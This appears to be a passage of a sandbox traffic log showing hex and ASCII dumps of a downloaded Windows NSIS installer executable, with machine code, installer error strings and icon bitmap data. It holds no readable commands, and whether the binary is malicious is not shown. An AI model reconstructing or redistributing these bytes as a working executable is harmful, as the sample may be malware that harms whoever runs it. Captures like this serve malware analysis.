                                                                                              2021-12-07 12:39:07 UTC1648INData Raw: 52 c7 58 bd 38 65 ec e8 bf 2c 4d fa 5b 0b d3 c5 65 05 93 95 48 2f aa d0 f8 df b3 be 6a 90 ee 7a d1 ac 40 4f 15 29 c4 47 b3 51 7f 82 f3 25 e9 4b 6b 31 d4 ff a5 11 8e 8d 4c 01 37 1f 46 66 86 b8 ec b8 e9 a4 93 d3 ed bc 77 a9 94 18 71 cb d8 0b 78 61 f6 8d e4 9e c5 c5 fb f6 66 83 51 0e 14 72 61 ff aa fe e0 04 a4 fd 79 89 1b f1 55 51 53 11 d3 cc ef 9a 77 8a 3e bf 87 f9 67 41 c3 2a 81 ab ef 48 da aa 5d 9d 96 68 ed 63 ed 4b 78 c9 85 b4 7b 6f e6 ee 18 4d 3e c7 bb dd f9 82 5c ad 3c 8d 20 78 45 4f be fa e5 c3 a2 d0 9e d1 d1 87 59 09 d2 17 02 34 1f 59 04 f3 5e ec c9 89 36 7e e0 f4 d1 dd e3 b3 f4 bf a9 df ef 1b 2d 4e f7 d0 0d a9 4f 98 d4 38 21 cf e4 7e f9 7e 20 6e 95 ca 68 94 7d 7d a0 40 ba 5b e8 ee 8f e1 7e 62 50 5b fa ce 2c b0 ae 1f e9 ae 65 bd 61 24 6d ff 05 57 40
                                                                                              Data Ascii: RX8e,M[eH/jz@O)GQ%Kk1L7FfwqxafQrayUQSw>gA*H]hcKx{oM>\< xEOY4Y^6~-NO8!~~ nh}}@[~bP[,ea$mW@
                                                                                              2021-12-07 12:39:07 UTC1656INData Raw: 0b ed c5 9d 80 7c f5 a9 e8 6a 19 93 77 35 95 75 f8 15 29 78 23 8a 4a 1b 74 e6 96 b2 40 71 f8 14 92 6a a7 7d a3 14 65 c4 20 91 c6 18 da 37 62 ee 2f 97 f2 74 b5 b1 4e da 9d 04 59 dd 4d 6a 7a 2d bc 94 49 58 84 97 0f 20 bd 9a 8e 49 17 58 3b 49 35 2b 7e 2f c8 62 ac 7e 04 e4 3b c9 f0 ba 81 74 c4 2e 79 25 1e 5e 41 6d 22 38 f7 4f 71 8a 74 73 29 b2 49 36 38 6a a4 41 63 b5 4c e9 8f 66 77 9f 82 e7 45 b3 59 c3 23 4e 46 2f 41 82 66 63 58 96 4b b9 af fa ee 66 dd dc 86 aa 1a 8e 6a ec 3d f3 4c 42 bb 62 f5 d9 c2 54 bd 1f 6f d2 f5 d9 12 e4 5b 9e 4c da 4a bd f6 a4 df b1 5e fa 7e 7d b7 4e 19 c5 94 a4 01 97 0c db 56 52 99 da b3 51 c2 b6 b3 c8 a3 52 c0 96 8d 52 11 71 2f d3 64 b1 3d a6 2e 58 27 d4 e0 8a c3 55 07 49 0d ce 3b 33 ba f9 31 37 2b 4e 2b 49 57 05 00 21 1d ad 11 52 39
                                                                                              Data Ascii: |jw5u)x#Jt@qj}e 7b/tNYMjz-IX IX;I5+~/b~;t.y%^Am"8Oqts)I68jAcLfwEY#NF/AfcXKfj=LBbTo[LJ^~}NVRQRRq/d=.X'UI;317+N+IW!R9
                                                                                              2021-12-07 12:39:07 UTC1664INData Raw: 49 7c 0f 21 55 20 cf 26 8f 3d f8 f9 06 9e 16 c2 38 4a 80 0a be f5 16 c9 71 87 13 fc a9 14 e9 9c 54 d4 c1 b1 6d 8a 38 13 47 bd e5 c7 92 2d eb 16 1a f1 b1 f6 14 61 ca 36 ed 16 6d 6d 21 1a 71 43 64 57 ac 12 bf f4 5f e3 1f 13 f1 ea a6 da bd 74 f6 a1 3b 49 e3 5f d8 23 d0 21 86 42 ca 61 49 fe 1e 9d 6b e7 bc 1b 33 d7 8a ad e9 9e dc 4e e3 a4 56 d8 5b 47 d8 17 79 b3 76 a4 72 a1 b1 ea a0 08 da 52 df 66 4d 6b b6 6f dc 56 05 01 0c 02 36 ee d2 8e 6b ce 8b a6 22 a7 0e 08 c9 35 cb 90 ba c4 44 f5 f5 6d 8e 34 36 89 28 1a 9b 74 b4 b8 30 ce b1 8c a6 fe bf 59 e3 44 c5 44 9e 16 11 67 2e 36 44 f1 a9 c2 66 f0 66 31 57 fe 26 eb d5 5b a0 0d 36 98 59 86 5c 83 e6 3d 8e 4f 57 9a 9c df fe 5c 9c be fe 8d 3b 63 56 55 42 5b 81 4e 78 4d eb e9 28 6a bd f9 1a 88 26 1b d1 16 0e da 55 7f d0
                                                                                              Data Ascii: I|!U &=8JqTm8G-a6mm!qCdW_t;I_#!BaIk3NV[GyvrRfMkoV6k"5Dm46(t0YDDg.6Dff1W&[6Y\=OW\;cVUB[NxM(j&U
                                                                                              2021-12-07 12:39:07 UTC1672INData Raw: 35 6f b1 c9 e1 1f 47 bf 62 48 cf 31 cb cf 4f 50 58 a1 3a d7 cc ce 43 9b 52 e6 52 14 31 e3 f6 a5 67 5a 01 f2 43 d5 38 fa 7d 6b 00 d0 cf 6f 21 e9 fb 40 7a 5f 7d 8f 21 d3 e4 78 52 5d 65 c2 0c db 97 6e 66 8e 5d db 57 04 0d a4 db d1 dd b5 03 c5 6b 0a c7 e0 42 62 d3 1c dd 15 17 df ff f5 e0 ef 49 50 7f cc 24 e3 d6 1f 4c 4d db ae a5 e6 d8 47 5b 62 63 fa eb 7f 1c 97 77 fd f1 14 19 0f 26 00 69 2d 5a 39 1c a5 aa 9e e4 5c 71 d1 b3 b9 95 71 b5 a9 0f a7 68 b5 38 60 4e ab 7f 32 26 76 d5 16 da b0 8c 8b 1d 5f 9b ff 08 38 1f c4 c5 af da f2 d0 a9 cb a8 3f d6 4b 46 dd 75 30 01 34 d9 df 97 b9 ff eb eb e2 72 f6 ab 77 9c a2 9f aa be 7e 24 b1 2a 59 df d7 b7 59 3d 01 d4 ac 03 34 25 1e a0 09 c0 a9 0f f7 92 31 77 1d 48 84 fc 3b 89 55 b9 fc 19 84 c4 d6 24 eb 7b 81 7f b4 35 36 7e 76
                                                                                              Data Ascii: 5oGbH1OPX:CRR1gZC8}ko!@z_}!xR]enf]WkBbIP$LMG[bcw&i-Z9\qqh8`N2&v_8?KFu04rw~$*YY=4%1wH;U${56~v
                                                                                              2021-12-07 12:39:07 UTC1680INData Raw: 6c cd fb 19 76 46 73 67 35 d0 22 18 5f 08 e9 c0 34 9d 49 6b de 12 f5 aa 2c 6c 7b 15 06 2d 57 43 e3 f4 ec cb c4 26 fa 9c 59 0d 25 1e 68 d9 40 70 02 b5 80 ec 23 25 ea 27 e3 34 32 6e 9a dd 50 42 7f aa a7 4d 90 d4 27 ac 95 64 b5 41 a8 8d 66 7b 2d 91 16 48 ed 06 2e d4 b6 1a 9e b0 c5 7c b6 c5 c4 58 a0 c7 70 e8 31 bc 7d f5 3e e1 48 e2 69 60 25 a2 72 0b a8 7b b0 9c ab 46 d4 9a 23 cb 47 3c e1 a5 94 47 44 da 80 af db db b7 84 5c 57 60 cf 34 fc 33 9f 71 42 80 23 82 d8 1e 99 0d 6a 1b dd ba 8d 0c 5c a1 95 cd 6f cb 84 61 92 57 0b 24 b1 d8 21 da c9 a4 8f 6d 1c ea 1f d1 05 33 0a 6c 28 3e 7d 1e 2f d1 53 37 75 95 61 83 c8 5f 67 e3 ed 14 95 24 a6 64 c8 15 b0 f2 66 e5 0c a5 93 71 2a 30 0a 02 2c 75 a1 96 a6 53 a4 b1 c6 4a 29 6a a9 d9 e7 41 4a 71 d1 a2 af 82 79 ff f2 87 fb 2f
                                                                                              Data Ascii: lvFsg5"_4Ik,l{-WC&Y%h@p#%'42nPBM'dAf{-H.|Xp1}>Hi`%r{F#G<GD\W`43qB#j\oaW$!m3l(>}/S7ua_g$dfq*0,uSJ)jAJqy/
                                                                                              2021-12-07 12:39:07 UTC1687INData Raw: ae 59 81 9f 67 71 ed 98 f5 03 fd 47 53 ee df ef 3f 9a eb 70 52 ff d1 32 8f 9b 70 1b 8b 6b 34 ae 0b 71 0d c7 95 81 cb 89 cb 36 fb ff 94 ff 68 2a 4c 89 50 a3 17 e2 5a 41 15 9b fd df e1 3f ba 6b 8e ee 3f fa e9 39 27 f5 1f 1d 9e cd 7d 42 91 d7 58 f1 73 21 ae 69 73 be c7 7f 74 d7 9c 1f ea 3f 9a f3 fd b7 fc 47 cb bc 9f c5 6d 03 ae 4d b8 ea 70 35 e3 6a c1 d5 8a 2b 34 e7 ff 94 ff 68 01 23 cb 5c f4 37 ae 0c 5c a3 e6 fe af ff e8 ff 4e ff d1 c4 e7 f8 c7 91 c7 11 4c 05 df b1 e3 32 eb d2 a5 98 14 6d ca 16 9e 12 e1 6b e4 c3 af ed 0b f7 19 ec 83 f6 d1 89 0a 86 61 ef 42 04 b0 a7 2d eb 58 f6 6e d0 31 3b 3c 92 ec 2e b3 7b 77 e1 7a bb cc fe fe f6 61 cd be 74 dc b7 0d 6b b6 bf 01 e5 e8 9a 6d 76 77 0b 12 80 09 0d b5 4c c5 87 0f 86 b5 ee 3a 90 5d 97 55 3f ac f9 ba 61 6f cf d4
                                                                                              Data Ascii: YgqGS?pR2pk4q6h*LPZA?k?9'}BXs!ist?GmMp5j+4h#\7\NL2mkaB-Xn1;<.{wzatkmvwL:]U?ao
                                                                                              2021-12-07 12:39:07 UTC1695INData Raw: 67 13 60 79 09 7b 52 10 e0 cb 71 57 46 a7 ca 3c b2 f5 a9 cd 33 37 e6 59 46 d5 ce 48 69 5f 4f 9e ab 2a 36 95 0f 9c ee 0a af 84 94 0b 59 a9 f5 5f 3a aa be 3c 71 0d cd b8 e5 d6 40 c5 63 84 81 ca 2c 75 0e 6c 08 1a 71 68 95 79 37 3a d2 bc cf 7c 24 ed 83 b4 16 1a 58 b3 d4 9b 7c 9f 28 15 58 82 bf 2e 06 19 ba 10 a0 bd 12 9e b1 3e 23 9d 7d 98 5a cf 7a 5d d9 be eb 0b 50 1b a8 7a b5 c1 14 04 56 0d a1 b4 96 9b 90 14 19 a0 be 07 90 16 93 a2 18 a2 3e 6a 12 a0 b4 3e b8 d2 82 e2 15 cc 49 cf 92 8f 26 da ce 05 dd 56 b6 63 66 42 15 9e 31 ef 7e e6 19 48 21 20 aa 40 a5 22 69 10 5e be 1e 1c 0d e1 58 da 57 08 50 b6 9b 23 5c d3 b4 16 98 a1 b8 b7 c2 fc c4 36 06 83 19 e7 a6 90 eb ae c1 10 32 2a 6f bb b6 44 45 5a 35 db e0 8f bc 60 93 d7 88 f3 29 9b 69 78 1c 47 c4 f0 62 e3 04 b3 6f
                                                                                              Data Ascii: g`y{RqWF<37YFHi_O*6Y_:<q@c,ulqhy7:|$X|(X.>#}Zz]PzV>j>I&VcfB1~H! @"i^XWP#\62*oDEZ5`)ixGbo
                                                                                              2021-12-07 12:39:07 UTC1703INData Raw: 33 ab 38 46 c7 60 ca c9 98 99 55 1d f3 5e c3 70 fa f9 2e a3 3b c6 d1 75 64 f4 bf 44 9a af 12 ed 64 cc aa 3f 25 b0 b2 c5 bc ff 90 48 97 89 d1 13 13 69 b9 64 f4 62 66 25 c6 e8 cb cc ea 8c d1 99 18 7e 65 f4 5c 66 f5 c5 e8 77 4c aa cc ac 90 c4 9a 4d 76 ee 0c 5f 56 98 93 e8 3e 66 f4 d9 24 3a 2f 66 9d c1 ac 48 19 5d 8a e9 33 c6 cc ac 58 93 59 99 49 b1 e9 73 8c 3c 18 59 3e 48 b6 ad 51 98 15 2d a3 7b 45 d3 75 64 cc cc 0a d7 aa 9f 44 b3 eb 44 ab 9d e1 fe 0a bb 91 5d ef 31 eb 1b 66 55 cc ac 6f 98 95 b1 d9 2e 5f 46 ff 61 f8 8f 31 33 e5 64 cc 66 3a 25 66 0d 64 66 d7 84 06 da 9c 60 37 6f 5b d7 e3 56 bb d9 b6 5e 66 74 0f 7b ff e1 55 fc 93 6d b9 57 cc e9 15 f6 11 34 9f 19 6c ba 03 33 d6 c6 54 d2 1d 4c d5 8e c1 66 76 4e 30 56 1b 9e 71 37 bc a4 cb 5a db 21 cd ae ee 23 69
                                                                                              Data Ascii: 38F`U^p.;udDd?%Hidbf%~e\fwLMv_V>f$:/fH]3XYIs<Y>HQ-{EudDD]1fUo._Fa13df:%fdf`7o[V^ft{UmW4l3TLfvN0Vq7Z!#i
                                                                                              2021-12-07 12:39:07 UTC1711INData Raw: 6b 6d 11 f9 1d bd ca f9 24 68 ac df 8b 81 d7 eb 9f 8d 4f 31 0c 38 2e ec 35 fa 86 f7 ef ef 0d 76 48 99 9a d5 7e 07 77 56 9a 6c 8a 7a 62 54 66 5e da cf b3 3b ce 2d e2 7a 7d 3f f1 93 ed 89 9b 1e eb 67 9f 1c 35 62 fe a3 8b a3 dc 47 8c 68 bd f8 9b a7 9c 84 a8 87 83 2f 8a bf 99 55 be d9 bf cf fe 11 85 f9 2d 36 ad 7a 7f c6 a5 6f b6 94 cd fa f4 fc 89 8f 4b cc bf 9e dd be d4 ab b8 4f 7a db ae a3 54 eb da 9d 9f 5d 3c 77 ee a1 e7 2d bb 6c 8e 19 5d 34 9f ff cd 0e df 01 cd 16 eb ff 6a 3a 5d 78 6e c7 d1 85 3f 8d ee 74 c3 e7 db 91 75 b6 d7 eb 77 39 f5 f6 de a9 ad 3c 47 ac 75 5a 7d f2 70 b7 3d c3 97 cc 5c da cc 79 66 44 c8 dd 08 c1 9e 89 97 15 0e 33 0d 9d a8 3f 6f a7 7e a0 ae 9b 56 b7 e1 e6 83 7b eb 77 7d 74 e9 56 4a e1 b4 39 e3 db e7 de ec 71 da 5d 57 fe 5c ef 97 e8 90
                                                                                              Data Ascii: km$hO18.5vH~wVlzbTf^;-z}?g5bGh/U-6zoKOzT]<w-l]4j:]xn?tuw9<GuZ}p=\yfD3?o~V{w}tVJ9q]W\
                                                                                              2021-12-07 12:39:07 UTC1719INData Raw: 7a 28 7b 2e ab 27 6f 2c 6f 09 cd 79 a8 dc 84 9c d7 cb 8f cb 4f cb 7f 86 86 df 48 d1 4d 31 50 31 53 31 4f f1 48 f1 0c 7a 49 67 68 86 fe ca 07 c8 ef b9 92 a3 fa 48 25 55 c5 a9 c6 a8 72 55 db 54 17 d0 fe 0e ea d6 ea 74 f5 3b 9a 26 9a 4e 9a 40 cd 54 a6 dd b9 0e f4 bc 59 97 cb e3 4a a1 57 05 70 87 72 93 e8 b6 9f c9 fd 12 3a 75 3b 9e 9a b7 96 bf 9f ff 27 bf 31 34 e6 8e 82 08 c1 79 81 93 b0 b5 f0 23 21 4f 18 28 8c 16 7e 8c 95 c1 5c cc 4f 2b 84 a7 31 8a 48 44 49 a2 4c 8c 81 7e e2 44 c8 78 84 44 27 19 25 59 28 89 94 66 48 33 a5 2b a4 1b a5 db d0 ba 2d 50 d3 58 8c 7f 0b d1 b6 8e 72 99 3c 1c 2d fa 5c 6e 54 94 29 ba 28 25 ca be e0 a2 79 aa bd aa 62 55 5b 75 67 68 53 4d 34 1f 69 e4 9a e7 b8 bc da 01 f7 56 43 ef e4 36 e2 b5 e4 d5 e1 87 f2 07 f0 c7 43 b3 6f 8c 99 62 93
                                                                                              Data Ascii: z({.'o,oyOHM1P1S1OHzIghH%UrUTt;&N@TYJWpr:u;'14y#!O(~\O+1HDIL~DxD'%Y(fH3+-PXr<-\nT)(%ybU[ughSM4iVC6Cob
                                                                                              2021-12-07 12:39:07 UTC1727INData Raw: 15 18 70 40 00 56 8b f8 ff 15 1c 70 40 00 eb 1f 6a 22 e8 18 07 00 00 8b 4d ec 83 e1 02 51 50 ff 75 e0 e8 fd 07 00 00 50 e8 42 07 00 00 8b f8 3b fb 0f 84 8d 05 00 00 e9 59 03 00 00 50 e8 e2 07 00 00 8b 75 ec 8b f8 8b 45 f0 6a 02 89 45 d0 e8 db 06 00 00 6a 11 89 45 bc e8 d1 06 00 00 8d 4d 08 53 51 8b 0d 10 ec 42 00 83 c9 02 53 51 53 53 53 50 57 c7 45 fc 01 00 00 00 ff 15 20 70 40 00 85 c0 0f 85 3c 05 00 00 83 fe 01 bf 78 a3 40 00 75 0e 6a 23 e8 96 06 00 00 57 e8 e9 35 00 00 40 83 fe 04 75 0e 6a 03 e8 66 06 00 00 56 a3 78 a3 40 00 58 83 fe 03 75 0f 68 00 0c 00 00 57 53 ff 75 e8 e8 c4 0a 00 00 50 57 ff 75 d0 53 ff 75 bc ff 75 08 ff 15 04 70 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 ce 00 00 00 68 19 00 02 00 e8 47 07 00 00 6a 33 8b f8 e8 34 06 00 00 3b fb 88 1e
                                                                                              Data Ascii: p@Vp@j"MQPuPB;YPuEjEjEMSQBSQSSSPWE p@<x@uj#W5@ujfVx@XuhWSuPWuSuup@u]uhGj34;
                                                                                              2021-12-07 12:39:07 UTC1734INData Raw: 00 c7 45 0c 0f 04 00 00 3d e9 03 00 00 0f 85 a4 00 00 00 6a 07 33 c0 59 8d 7d bc ff 75 fc f3 ab 8b 45 08 bf d8 9f 42 00 68 a8 93 42 00 89 45 b8 89 7d c0 c7 45 cc 50 44 40 00 89 75 d0 e8 12 17 00 00 89 45 c4 8d 45 b8 50 c7 45 c8 41 00 00 00 ff 15 54 71 40 00 85 c0 74 56 50 ff 15 78 72 40 00 56 e8 be 11 00 00 a1 70 eb 42 00 8b 80 1c 01 00 00 85 c0 74 28 81 fe 00 44 43 00 75 20 50 6a 00 e8 ce 16 00 00 57 bf 00 db 42 00 57 ff 15 f0 70 40 00 85 c0 74 07 57 56 e8 b0 16 00 00 ff 05 c4 9f 42 00 56 53 ff 75 08 e8 23 0f 00 00 eb 07 c7 45 0c 0f 04 00 00 81 7d 0c 0f 04 00 00 74 0d 81 7d 0c 05 04 00 00 0f 85 75 01 00 00 83 65 fc 00 83 65 f8 00 56 53 e8 fb 0e 00 00 56 e8 24 12 00 00 85 c0 75 07 c7 45 fc 01 00 00 00 bf a0 8f 42 00 56 57 e8 39 16 00 00 33 db 53 e8 4f 19
                                                                                              Data Ascii: E=j3Y}uEBhBE}EPD@uEEPEATq@tVPxr@VpBt(DCu PjWBWp@tWVBVSu#E}t}ueeVSV$uEBVW93SO
                                                                                              2021-12-07 12:39:07 UTC1742INData Raw: 51 50 89 45 f8 50 6a 13 8d 46 0c 6a 13 50 c7 07 07 00 00 00 e8 c8 06 00 00 85 c0 75 12 39 07 74 0e 21 46 08 c7 06 0d 00 00 00 e9 1d 01 00 00 c7 06 11 00 00 00 e9 c4 05 00 00 8b 86 0c 05 00 00 eb 20 83 7d cc 00 0f 84 c2 05 00 00 8b 4d c8 ff 4d cc 0f b6 11 8b cb d3 e2 09 55 c0 ff 45 c8 83 c3 08 3b d8 72 dc 0f b7 04 45 40 93 40 00 23 45 c0 8b 8e 10 05 00 00 8d 04 81 0f b6 50 01 0f b7 40 02 83 f8 10 89 45 ec 73 16 8b ca 2b da d3 6d c0 8b 4e 08 89 44 8e 0c ff 46 08 e9 ac 00 00 00 83 f8 12 75 0c 6a 07 c7 45 f8 0b 00 00 00 58 eb 2c 83 c0 f2 c7 45 f8 03 00 00 00 eb 20 83 7d cc 00 0f 84 47 05 00 00 8b 4d c8 ff 4d cc 0f b6 39 8b cb d3 e7 09 7d c0 ff 45 c8 83 c3 08 8d 0c 10 3b d9 72 d9 8b ca 2b da d3 6d c0 0f b7 0c 45 40 93 40 00 23 4d c0 8b 55 f8 2b d8 03 d1 8b c8
                                                                                              Data Ascii: QPEPjFjPu9t!F }MMUE;rE@@#EP@Es+mNDFujEX,E }GMM9}E;r+mE@@#MU+
                                                                                              2021-12-07 12:39:07 UTC1750INData Raw: 77 6e 6c 6f 61 64 20 61 6e 64 20 64 61 6d 61 67 65 64 20 6d 65 64 69 61 2e 20 43 6f 6e 74 61 63 74 20 74 68 65 0a 69 6e 73 74 61 6c 6c 65 72 27 73 20 61 75 74 68 6f 72 20 74 6f 20 6f 62 74 61 69 6e 20 61 20 6e 65 77 20 63 6f 70 79 2e 0a 0a 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 74 3a 0a 68 74 74 70 3a 2f 2f 6e 73 69 73 2e 73 66 2e 6e 65 74 2f 4e 53 49 53 5f 45 72 72 6f 72 00 45 72 72 6f 72 20 6c 61 75 6e 63 68 69 6e 67 20 69 6e 73 74 61 6c 6c 65 72 00 00 00 2e 2e 2e 20 25 64 25 25 00 00 00 00 53 65 53 68 75 74 64 6f 77 6e 50 72 69 76 69 6c 65 67 65 00 7e 6e 73 75 2e 74 6d 70 00 00 00 00 5c 54 65 6d 70 00 00 00 4e 53 49 53 20 45 72 72 6f 72 00 00 45 72 72 6f 72 20 77 72 69 74 69 6e 67 20 74 65 6d 70 6f 72 61 72 79 20 66 69 6c 65 2e 20 4d 61
                                                                                              Data Ascii: wnload and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_ErrorError launching installer... %d%%SeShutdownPrivilege~nsu.tmp\TempNSIS ErrorError writing temporary file. Ma
                                                                                              2021-12-07 12:39:07 UTC1758INData Raw: 00 00 00 00 00 00 01 00 00 00 28 00 00 00 8f 00 00 00 eb 00 00 00 ff 00 00 00 ff 00 00 00 fe 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 fe 00 00 00 ff 00 00 00 ff 04 00 03 ff 0f 00 0b fe 21 01 18 ff 34 03 26 ff 45 04 33 ff 53 05 3e fe 56 06 41 ff 57 07 42 ff 59 07 43 ff 59 08 44 fe 5a 08 45 ff 5b 08 46 ff 5c 09 47 ff 5c 09 47 fe 5d 09 48 ff 5e 0a 49 ff 5e 0a 49 ff 5e 0a 49 fe 5e 0a 49 ff 5e 0a 49 ff 5e 0a 49 ff 5d 09 49 fe 5d 09 48 ff 5c 09 47 ff 5b 08 46 ff 5b 08 45 fe 5a 08 44 ff 59 07 43 ff 58 07 43 ff 57 06 41 fe 54 05 3e ff 45 04 33 ff 34 03 27 ff 21 02 18 fe 0f 00 0b ff 04 00 03 ff 00 00 00 ff 00 00 00 fe 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 fe 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 eb 00 00 00 8f 00 00 00 28 00 00 00 01 00 00 00 00
                                                                                              Data Ascii: (!4&E3S>VAWBYCYDZE[F\G\G]H^I^I^I^I^I^I]I]H\G[F[EZDYCXCWAT>E34'!(
                                                                                              2021-12-07 12:39:07 UTC1766INData Raw: 00 00 c5 00 00 00 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 a9 00 00 00 fe 00 00 00 ff 00 00 00 ff 00 00 00 ff 05 00 04 fe 4c 0b 3b ff 6b 12 54 ff 70 16 59 ff 75 19 5f fe 7a 1d 64 ff 7f 21 69 ff 83 25 6e ff 87 28 72 fe 8b 2b 76 ff 8f 2e 7a ff 91 31 7d ff 95 34 80 fe 97 37 83 ff 99 39 86 ff 9c 3b 88 ff 9d 3d 8a fe 9f 3e 8b ff a0 40 8d ff a1 41 8e ff a2 42 8f fe a3 42 90 ff a4 43 90 ff a5 44 91 ff a5 45 92 fe a6 46 93 ff a7 46 94 ff a8 47 94 ff a8 48 95 fe
                                                                                              Data Ascii: L;kTpYu_zd!i%n(r+v.z1}479;=>@ABBCDEFFGH
                                                                                              2021-12-07 12:39:07 UTC1773INData Raw: 00 00 fe 00 00 00 fe 00 00 00 fe 00 00 00 fe 07 04 06 fe 15 0c 14 fe 4b 2b 44 fe 95 57 88 fe d6 7d c5 fe e3 84 d0 fe e4 85 d1 fe e3 84 d0 fe e4 85 d1 fe e4 85 d1 fe e4 85 d1 fe e3 84 d0 fe e4 85 d1 fe e4 85 d1 fe e6 87 d3 fe e4 85 d1 fe e1 82 ce fe dc 7d c9 fe d6 77 c3 fe cf 6f bb fe c8 68 b5 fe c6 66 b3 fe c6 66 b2 fe c5 65 b1 fe c4 64 b1 fe c3 63 b0 fe c2 63 af fe c1 61 ae fe c1 61 ad fe c0 60 ac fe bf 5f ab fe be 5e aa fe bd 5d a9 fe bb 5b a8 fe ba 5a a7 fe b9 59 a6 fe b8 58 a5 fe b7 57 a3 fe b5 55 a1 fe b2 51 9e fe af 4d 9a fe ab 49 96 fe a6 45 91 fe a1 40 8b fe 9b 39 85 fe 95 33 7e fe 8e 2c 77 fe 87 25 6f fe 7f 1e 67 fe 44 0d 36 fe 00 00 00 fe 00 00 00 fe 00 00 00 fe 00 00 00 fe 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: K+DW}}wohffedccaa`_^][ZYXWUQMIE@93~,w%ogD6>
                                                                                              2021-12-07 12:39:07 UTC1781INData Raw: 67 b5 fe ca 6b b7 fe cc 6c b9 fe cd 6e ba fe ce 6f bb fe cf 71 bc fe d0 72 bd fe d1 73 be fe d2 74 bf fe d3 75 c0 fe d4 75 c1 fe d5 76 c1 fe d5 77 c2 fe d6 78 c3 fe d7 78 c4 fe d7 79 c4 fe db 7d c8 fe e0 82 cd fe e4 85 d1 fe de 7f cb fe d1 72 be fe d1 72 be fe d1 72 be fe d1 71 be fe cf 70 bb fe 3a 1f 34 fe 00 00 00 fe 7e 7b 70 fe cd cb bf fe de dd d5 fe e6 e5 df fe eb ea e6 fe ef ef eb fe ef f1 eb fe 7d bf 54 fe 3c a2 00 fe 26 c4 4a fe 1f e2 91 fe 1a e1 8e fe 18 e1 8d fe 42 e7 a2 fe 2b e4 97 fe 45 e7 a3 fe 47 e7 a4 fe 4c e8 a7 fe 4d e8 a7 fe 4a df a1 fe 44 cb 93 fe 44 cc 93 fe 4a df a1 fe 4d e8 a7 fe 4c e8 a7 fe 47 e7 a4 fe 44 e7 a3 fe 2b e4 97 fe 42 e7 a2 fe 18 e1 8d fe 1a e1 8e fe 1f e2 91 fe 26 c4 4a fe 3c a2 00 fe 80 c2 58 fe fb fd f9 fe fd fd fd fe
                                                                                              Data Ascii: gklnoqrstuuvwxxy}rrrqp:4~{p}T<&JB+EGLMJDDJMLGD+B&J<X
                                                                                              2021-12-07 12:39:07 UTC1789INData Raw: 88 d1 ff e3 87 d1 ff e2 87 d1 ff e1 87 d0 fe e1 86 d0 ff e1 86 d0 ff e0 85 cf ff e0 84 cf fe df 84 ce ff df 84 cd ff de 83 cd ff dc 81 ca fe d9 7d c7 ff d5 74 c1 ff d1 6d bc ff cb 66 b6 fe c5 5e ae ff be 55 a7 ff b6 4b 9e ff ae 40 95 fe a5 35 8a ff 5e 19 4d ff 00 00 00 ff 00 00 00 fe 00 00 00 ff 00 00 00 ff 00 00 00 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 d9 00 00 00 fe 00 00 00 fe 00 00 00 fe 28 0a 21 fe 9e 2f 83 fe ab 3c 91 fe b3 47 9a fe bb 51 a3 fe c2 5a ab fe c9 63 b3 fe cf 6a b9 fe d3 71 bf fe d7 7a c5 fe da 80 c9 fe dd 83 cc fe de 84 cd fe df 85 ce fe e0 85 ce fe e0 86 cf fe e1 86 d0 fe e1 87 d0 fe e1 87 d0 fe e2 88 d1 fe e2 88 d1 fe e3 89 d2 fe
                                                                                              Data Ascii: }tmf^UK@5^M4(!/<GQZcjqz
                                                                                              Data Ascii: R,!?^6/BO?kRKyMK]Uy~Zsh_i"gz'm;Y\6%XAN(e^m1]YD?[?>><G<?d6s}F>Oucq7+/nz/S\Si>}p+,$y7oU\Wvob??6}oB
                                                                                              2021-12-07 12:39:07 UTC2078INData Raw: fc db 0d cc 7a e8 ff 76 8e e4 61 fe ef 7d f1 87 cb 8d 67 83 f2 ac eb fe c7 9f 81 7f ea b1 66 39 5f 4a 8a 26 ab 06 ff 3b 48 d8 c8 e2 e3 59 dd 1a af f7 41 8f 86 33 1c d4 d4 e2 b0 7e 15 31 5e e4 3f 8e 9d 01 ff 85 92 62 a5 18 f3 9f bd f5 81 9b f4 1d 35 47 49 88 fc 9f 21 8f 64 6a 17 6b ec 7f 99 96 9d 0d 91 ff 5c e1 2c 46 01 ff a3 13 73 bc c5 81 43 7c 5c 17 ef 21 ff cb 9b 7c 95 62 34 d9 f3 94 02 a9 f6 13 bb 35 ff a3 0b aa 0c e0 ff 7f 01 fe 3f e9 0a fe eb a2 09 c1 7f d8 82 fc d7 df d0 3f 29 5c 6e da 50 fc 04 f5 cf 8e a2 b5 fc 07 af a9 ec 6d a4 f9 c8 7f 67 45 78 26 91 7f 62 14 a4 6e b1 b3 eb 5c ba 8b 83 37 f8 af 3e 66 3c 95 99 73 74 2c ad f6 e5 92 bb a9 5e 13 f9 9f bc 57 5b 0f 5a b7 db 5a 42 ff 2a f6 85 92 71 29 ef fe c8 1f e2 fc 93 03 ff be b3 7d d0 40 c3 c8 5d
                                                                                              Data Ascii: zva}gf9_J&;HYA3~1^?b5GI!djk\,FsC|\!|b45??)\nPmgEx&bn\7>f<st,^W[ZZB*q)}@]
